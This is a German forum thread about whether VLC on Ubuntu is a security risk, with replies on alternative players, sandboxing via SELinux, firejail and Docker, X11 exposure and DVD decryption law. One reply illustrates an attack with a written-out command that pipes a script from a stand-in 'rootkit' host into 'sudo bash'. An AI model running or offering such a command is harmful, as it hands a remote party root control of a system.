Hi zusammen, ich hatte bis vor kurzem Windows und erinnere mich noch gut daran, dass der VLC MediaPlayer ständig wegen Sicherheitslücken erwähnt wurde. Erinnerte mich von der Häufigkeit her irgendwie an den Adobe Flash Player. Jetzt suche ich für Linux (Ubuntu 18.04) einen Allrounder, der die meisten gängigen Formate abspielen kann. Es geht nicht darum, jedes noch so exotische Format abspielen zu können, sondern eher darum, dass man die allgemein üblichen Dateien (mal ne DVD vom Kumpel, mal Handyvideos von diversen Android oder Apple Phones, mal selbst geschnittene Videos auf Stick, etc.) mehrheitlich klaglos abgespielt bekommt. Kann hier jemand etwas zur Medien-Abspiel-Situation unter Ubuntu sagen? Ich erinnere mich noch dunkel an irgendwelchen Lizenz-Mist wegen MPEG2 unter Windwos. Hole ich mir mit dem VLC unter Linux wie unter Windows ständig Sicherheitslücken ins Haus? Vielen Dank und herzliche Grüße Mike
Ich nutze mpv. Ob der mehr oder weniger sicher als VLC ist, kann ich Dir aber nicht sagen.
Wirklich relevant ist dieses Thema nur, wenn Dateien aus zweifelhaften Quellen abgespielt werden müssen. Dann darf der Medienspieler sich nicht durch absichtliche Manipulationen aufs Kreuz legen lassen. Wenn dieses Thema nicht relevant ist, würde ich mir darüber wenig Sorgen machen. Selbst nutze ich den VLC schon seit gefühlten Ewigkeiten. Selbst mit Aufzeichnungen aus DVBT/DVBS gab es seltener Probleme (bei Empfangsproblemen muss man dort immer mal mit Übertragungsfehlern rechnen) als bei anderen Abspielprogrammen.
Klar gibt es noch anderes, wie z.B. mpv, mplayer, etc. Teils verwenden die aber die gleichen Libraries. Ansonsten gibt es noch diverse wege, wie man Programme besser sandboxen/abschotten kann. z.B. mit namespaces, cgroups, seccomp, LSMs (selinux,apparmor,smack,...), etc. Dafür gibt es dann auch diverse tools, wie z.B. minijail, firejail, unshare, etc. Es kommt halt ganz drauf an, wegen welche szenarien man sich schützen will, und worauf man dem Programm zugriff geben will. Die tools sind für meinen geschmack in der Regel aber etwas zu permissiv. Vielleicht schreib ich mir auch mal eins, bei dem das Programm dann per default garnichts sieht oder so.
mplayer + grafische Oberfläche GMPlayer. Kann jeden Dreck abspielen und ist sehr zuverlässig. sudo apt-get install gnome-mplayer
Mike schrieb: > ich hatte bis vor kurzem Windows und erinnere mich noch gut daran, dass > der VLC MediaPlayer ständig wegen Sicherheitslücken erwähnt wurde. Das ist etwas gutes und nichts schlechtes. Eine Software, die viele CVE Sicherheitsmeldungen hat bedeutet, dass die Software gut gepflegt wird und sich die Entwickler auch ernsthaft um die Sicherheitslücke kümmern und diese als solche (CVE Meldung) auch publizieren, anstatt einfach unter den Teppich zu kehren und nicht zu fixen. Die Anzahl der CVE Meldungen bzw. gemeldeten Sicherheitslücken sagt somit nichts über die Qualität der Software aus, sondern über die Qualität des Support. Sehr vorsichtig muss man also bei Software sein, die kaum gemeldete Sicherheitslücken haben, da könnten hunderte Sicherheitslücken drin stecken und keiner, außer die, die sie ausnutzen wollen, erfährt davon. Das Sicherheitslücken bei solchen Projekten vorkommen können, ist ganz normal. Bei Browsern kommt das übrigens noch häufiger vor, aber nicht bei jedem Browser wird dieses Problem entsprechend auch kommuniziert wie man es von einem verantwortungsbewussten Softwareentwickler erwarten würde. > Erinnerte mich von der Häufigkeit her irgendwie an den Adobe Flash > Player. Der Flashplayer war aus ganz anderen Gründen unbeliebt, die Sicherheitslücken wurden lediglich von Laien als Grund vorgeschoben. Das Problem von dem war eher, dass er im Internet ein unbeliebter Fremdkörper war und dass er leicht Sicherheitslücken enthalten konnte, die man für einen Angriff ausnutzen hätte können, lag in seiner exponierten Natur, die er auch mit bspw. Browsern teilt. > Jetzt suche ich für Linux (Ubuntu 18.04) einen Allrounder, der > die meisten gängigen Formate abspielen kann. Nimm VLC. Der wird am besten gepflegt. Auch noch okay wäre mplayer, aber das ist ein reiner Kommandozeilenplayer. Es gibt für diesen zwar GUIs, aber die funktionieren mehr schlecht als recht. Als Teil des Gnome Projekt gibt es ansonsten noch Totem, aber sicherer als VLC ist der auch nicht. Viele dieser Videoplayer teilen sich übrigens die darunterliegenden Codec Bibliotheken. Die Sicherheit erhöhen kannst du, in dem den Videoplayer in einer Sandbox oder als extra Benutzer ohne viele Rechte laufen lässt. Unter Linux gibt es da einige Möglichkeiten. Softwaretechnisch könnte nur ein Videoplayer, der in einer Programmiersprache geschrieben wird, die allein schon mehr Sicherheit erzwingt, für mehr Sicherheit sorgen. Also bspw. einer der in der Programmiersprache Rust geschrieben wurde, aber diesbezüglich ist mir noch keiner bekannt und da die ganzen Codecs, auf die diese Videoplayer zugreifen, immer noch die Programmiersprache C als Programmiersprache verwenden, ist der Sicherheitsgewinn auf die Codebestandteile beschränkt, die auch in Rust oder vergleichbaren Sprache geschrieben wurden. > Kann hier jemand etwas zur Medien-Abspiel-Situation unter Ubuntu sagen? > Ich erinnere mich noch dunkel an irgendwelchen Lizenz-Mist wegen MPEG2 > unter Windwos. MPEG 2 ist nicht das Problem. Viele DVDs haben den Content Scramble System (CSS) Abspielschutz. Die Umgehung dieses Abspielschutzes ist in Deutschland so ne rechtliche Sache, das ist das Problem. In anderen Ländern, in denen es bezüglich dem CSS Abspielschutz kein rechtliches Problem gibt, installiert man die Bibliothek libdvdcss und kann dann dort die DVDs damit ansehen. Bei BluRays nimmt man in solchen Ländern die libaacs und libbluray Bibliothek, in Deutschland darf man das nicht. Die Entwicklung dieser Bibliotheken wird von der Videolan Organization durchgeführt, die auch VLC entwickelt haben. > Hole ich mir mit dem VLC unter Linux wie unter Windows ständig > Sicherheitslücken ins Haus? Jede Software kann Sicherheitslücken enthalten, die Gefahr ist allerdings auch davon abhängig, wie man die Software nutzt und wie man die Software nutzen kann. Eine netzwerkfähige Software ist bspw. dem Internet gegenüber exponiert, wenn diese Verbindungen mit fremden Rechnern aus dem Internet aufbaut oder auf Verbindungen mit solchen Rechnern wartet. Eine Software die das nicht tut, kann zwar auch eine Sicherheitslücke enthalten, aber dafür braucht man dann schon lokalen Zugang um sie zu auszunutzen. Für VLC bedeutet das also, wenn du VLC nicht zum Internetstreaming verwendest und auch nicht damit Mediadateien aus dubiosen Quellen aus dem Internet abspielst, dann ist die Nutzung von VLC eine sehr sichere Angelegenheit. VLC kann allerdings im Internet noch Albumcover und Titelnamen für CDs aus entsprechenden CDDA Datenbanken nachladen, dies kann man allerdings auch abschalten, wenn man befürchtet, dass von diesen eine Gefahr ausgehen könnte. Bedenke bitte auch, auf VLC werden von der EU Bug Bountys ausgeschrieben. D.h. Leute, die in VLC Sicherheitslücken finden und melden und an dem Bug Bountry Programm teilnehmen, bekommen von der EU Geld. Dies soll ein Ansporn für Entwickler sein, VLC sicherer zu machen. Für andere Videoplayer gibt es kein derartiges Bug Bounty Programm seitens der EU, entsprechend gering ist somit das Interesse, dass da jemand nach Sicherheitslücken sucht, vorhanden können Sicherheitslücken aber dennoch sein, die Frage ist immer, ob sie jemand entdeckt und ausnutzt oder stopft. Siehe dazu auch: https://juliareda.eu/2018/12/eu-fossa-bug-bounties/ Insofern kannst du ganz beruhigt bei VLC bleiben. Du musst einfach nur dafür sorgen, dass deine Distribution aktuell gehalten wird und eine Distribution verwenden, die dafür sorgt, dass die Pakete auch wirklich aktualisiert werden, wenn Sicherheitslücken gemeldet wurden. Bei Ubuntu ist das leider für Pakete aus dem multiverse und universe Repository nicht gewährleistet, daher wäre ein Wechsel zu einer anderen Distribution, z.B. Debian stable ratsam, wenn man Programme bzw. Pakete verwenden will, die aus diesen Repositories installiert werden. VLC ist bspw. so ein Paket, das aus universe in Ubuntu versorgt wird. Canonical kümmert sich offiziell also nicht um Sicherheitslücken bei vlc, das wird der allein der Community überlassen. Allerdings wird der Videoplayer totem von Canonical offiziell supported, dessen Paket kommt nämlich aus dem main Zweig. Speziell im Fall von Ubuntu wäre also der Wechsel zu totem ratsam. Da man aber oftmals noch dutzende andere Pakete installiert, die sich nicht im main Repository befinden, z.B. Gimp oder KDE (beide befinden sich in universe), wäre ein Wechsel zu einer anderen Distribution, wie bspw. Debian stable meiner Meinung nach sinnvoller.
Nano schrieb: > Der Flashplayer war aus ganz anderen Gründen unbeliebt, die > Sicherheitslücken wurden lediglich von Laien als Grund vorgeschoben. Nee, ganz so war es nicht. Der war schon schlecht. Diverse Fehler kamen immer wieder. Adobe hat den von Billigprogrammierern zusammenstückeln lassen und war unwillig Geld in die Hand zu nehmen um das Code-Chaos aufzuräumen. Der wurde im Laufe der Jahre einfach nicht besser. Mit viel Macht kommt viel Verantwortung. Die Verantwortung wollte Adobe nicht wahrnehmen. > Die Sicherheit erhöhen kannst du, in dem den Videoplayer in einer > Sandbox oder als extra Benutzer ohne viele Rechte laufen lässt. Unter > Linux gibt es da einige Möglichkeiten. Wenn du es richtig wie ein Hipster machen willst, die moderne Sandbox ist ein Docker-Container. Also wenn man Angst hat ab in einen Container mit dem VLC. > Also bspw. einer der in der Programmiersprache Rust geschrieben wurde, Dies war der Werbeblock ...
Hannes J. schrieb: > die moderne Sandbox ist ein Docker-Container. Wie war das mit den letzten Docker-Bugs? Ein unprivilegierter Prozess in einem unprivilegiertem Docker-Container hat Vollzugriff mit Root-Rechten auf das Host-Dateisystem? Macht's nicht unbedingt sicherer... Dann: Docker-Container, die man sich von Dockerhub o.Ä. zieht haben meistens unsichere, veraltete Software mit an Bord, wenn nicht gar gleich Backdoors... Da traue ich dem Maintainer-Prozessen von Debian schon mehr, als "jeder mit einem Github-Account ist 100% vertrauenswürdig"... Schließlich: Der Videoplayer im Docker-Container braucht Zugang zu deinem X11-Server. Damit kann ein Angreifer in deinem Container deinen Bildschirm sehen, deine Tasteneingaben mitlesen, selber Tasteingaben-Events einschleusen, Mausklicks simulieren usw. d.H. das 'curl http://boeses-rootkit.1337/shell.sh | sudo bash' ist da genauso schnell ausgeführt, je nach Angriffsvektor im Medienplayer merkt der Angreifer noch nichtmal, dass er eigentlich in einer Sandbox stehen sollte. Fazit: Docker ist schick zum Software-Deployment, aber als Sicherheits-Feature am Desktop braucht man es nicht zu verkaufen... --> installier dir den vlc aus den Distro-Paktetquellen (oder dem offiziellen PPA https://launchpad.net/~videolan/+archive/ubuntu/stable-daily) und halte dein System aktuell.
Hannes J. schrieb: > Nano schrieb: >> Der Flashplayer war aus ganz anderen Gründen unbeliebt, die >> Sicherheitslücken wurden lediglich von Laien als Grund vorgeschoben. > > Nee, ganz so war es nicht. Der war schon schlecht. Diverse Fehler kamen > immer wieder. Adobe hat den von Billigprogrammierern zusammenstückeln > lassen und war unwillig Geld in die Hand zu nehmen um das Code-Chaos > aufzuräumen. Der wurde im Laufe der Jahre einfach nicht besser. Ja, ein schlechtes Qualitätsmanagement kann es natürlich auch sein. Dennoch ist es halt in der Natur seiner Sache, dass er für Angriffe recht exponiert war und durch seine Skriptingfähigkeiten auch entsprechend ausgenutzt werden konnte. Javascript fähige Browser sind da nicht viel besser, da gibt's hunderte entdeckter Sicherheitslücken pro Jahr. Das Javascript nicht genauso unbeliebt ist, liegt daran, weil es ein offener Internet Standard ist und von Webentwicklern als solcher auch gewollt ist. Übrigens ganz so nebenbei bemerkt ist das auch ein Grund, warum Mozilla die Programmiersprache Rust entwickelte und den Code von Firefox nach und nach auf Rust umstellt bzw. in Rust neu schreibt. > Mit viel Macht kommt viel Verantwortung. Die Verantwortung wollte Adobe > nicht wahrnehmen. Kann sein, sie könnten aber auch überfordert gewesen sein. Siehe der Verweis auf die Browserhersteller, da ist es nicht viel anders. > >> Also bspw. einer der in der Programmiersprache Rust geschrieben wurde, > > Dies war der Werbeblock ... :) Rust erzwingt sicheres Programmieren, bei C und C++ ist es ein kann, aber kein muss und ein Großteil der Programmierer überschätzt sich selbst oder macht Fehler. Selbst in gestandenen und bekannten Projekten von erfahrenen C und C++ Programmieren werden regelmäßig noch Sicherheitslücken gefunden, wie das Bug Bounty Programm der EU zeigt. Hier mal bspw. die Lücken, die man in putty durch das Bug Bounty Programm gefunden hat: https://hackerone.com/putty_h1c/hacktivity?order_direction=DESC&order_field=popular&filter=type%3Aall Putty ist in C geschrieben: https://git.tartarus.org/?p=simon/putty.git;a=tree Viele der Probleme wären mit einer Programmiersprache Rust vermeidbar.
Mit SELinux müsste sich da was machen lassen, à la: "Normale" Programme (Kontexte) dürfen nach ~/Videos nur schreiben, nicht lesen. Der VLC wird per Transition Rule direkt in einen eigenen Kontext eingetütet. Dieser darf ausschließlich von ~/Videos lesen, sonst nirgendwo, und auch nirgendwo hin schreiben und auch keine Sockets öffnen und keine weiteren Transitions durchführen. Ein per Virus übernommener VLC kann also nichts anderes angreifen und auch keine sensiblen Daten lesen. Probleme die es dabei noch gibt: - Man kann "normale" Programme nicht daran hindern, sensible Informationen (nicht nur Videos) nach ~/Videos zu speichern - Der VLC muss notwendigerweise mit dem X-Server und OpenGL-Treiber kommunizieren. Diese kann man eventuell übernehmen. Über den X-Server lassen sich Tastendrücke und Bildschirminhalt abgreifen.
Dr. Sommer schrieb: > - Der VLC muss notwendigerweise mit dem X-Server und OpenGL-Treiber > kommunizieren. Diese kann man eventuell übernehmen. Über den X-Server > lassen sich Tastendrücke und Bildschirminhalt abgreifen. Dieses Problem wäre mit Wayland lösbar.
Dr. Sommer schrieb: > - Der VLC muss notwendigerweise mit dem X-Server und OpenGL-Treiber > kommunizieren. Diese kann man eventuell übernehmen. Über den X-Server > lassen sich Tastendrücke und Bildschirminhalt abgreifen. Es gibt da anscheinend ne security extension: https://www.reddit.com/r/openbsd/comments/b87h60/x11_isolation_between_windows/ejwycdq/ Da muss man den Socket halt mit nem cookie mit der enabled in die Sandbox packen.
Un-Docker schrieb: > Hannes J. schrieb: >> die moderne Sandbox ist ein Docker-Container. > > Wie war das mit den letzten Docker-Bugs? Da ist meine Ironie mit Hipster-Docker nicht verstanden worden. Die ganzen "Lösungen" mit Sandbox leiden unter den gleichen Problemen. Aus Sandboxen wird schon mal ausgebrochen, Zugriff aufs GUI nötig, Zugriff auf Audio nötig, ... Warum also Docker? Der TS mach ein Fass wegen einer gut gepflegten Software, VLC, auf. Warum? Das gleiche Fass könnte er beim Windows Media Player oder Groove auf machen. Also nochmal, warum VLC? Entweder: >> wenn man Angst hat Dann reicht eine kräftige Beruhigungspille ala Hipster-Docker "das modernste, beste, super tolle Zeug, das muss doch helfen". Oder er macht das Fass als Troll auf "Linux ist scheiße". Dann hat er Hipster-Docker erst recht verdient.
Mike schrieb: > Hole ich mir mit dem VLC unter Linux wie unter Windows ständig > Sicherheitslücken ins Haus? Ja. Lass doch den Player auf Hardware laufen, die keinen oder stark abgesicherten Zugriff auf sensible Daten oder Netzwerke hat. (RasPi, ChromeCast)
Wow, endlich mal ein Thread ohne Getrolle wo auch auf die gestellte Frage eingegangen wird. Das habe ich so in diesem Forum seit vielen Jahren nicht mehr gesehen!
Hannes J. schrieb: > Die ganzen "Lösungen" mit Sandbox leiden unter den gleichen Problemen. > Aus Sandboxen wird schon mal ausgebrochen, Zugriff aufs GUI nötig, > Zugriff auf Audio nötig, ... Warum also Docker? Es ist nicht einfach, aus containern auszubrechen. Malware wird das vermutlich meist nicht versuchen, weil das nicht viele darin laufen lassen. Zudem ist es schwieriger, ganze 2 exploits für 2 Progremmen zu finden, als nur einen für eins. Zudem sind Container schon lange ohne Root erstellbar, ein Exploit der Root erlangt ist dann nicht möglich. Dass es bei docker möglich war, zeigt nur, dass docker unsicher aufgebaut ist. Sowas darf nicht als root laufen, und wenn es das nicht tut, bekommt man auch kein root.
DPA schrieb: > Hannes J. schrieb: >> Die ganzen "Lösungen" mit Sandbox leiden unter den gleichen Problemen. >> Aus Sandboxen wird schon mal ausgebrochen, Zugriff aufs GUI nötig, >> Zugriff auf Audio nötig, ... Warum also Docker? > > Es ist nicht einfach, aus containern auszubrechen. Malware wird das > vermutlich meist nicht versuchen, weil das nicht viele darin laufen > lassen. Zudem ist es schwieriger, ganze 2 exploits für 2 Progremmen zu > finden, als nur einen für eins. Ja, das ist moderne Security: Jedes Layer ist kaputt, deshalb stapelt man einfach 15 Stück übereinander und sagt "ach, das sind so viele, da werden ja wohl kaum alle kaputt gehen!" ;)
Bitte melde dich an um einen Beitrag zu schreiben. Anmeldung ist kostenlos und dauert nur eine Minute.
Bestehender Account
Schon ein Account bei Google/GoogleMail? Keine Anmeldung erforderlich!
Mit Google-Account einloggen
Mit Google-Account einloggen
Noch kein Account? Hier anmelden.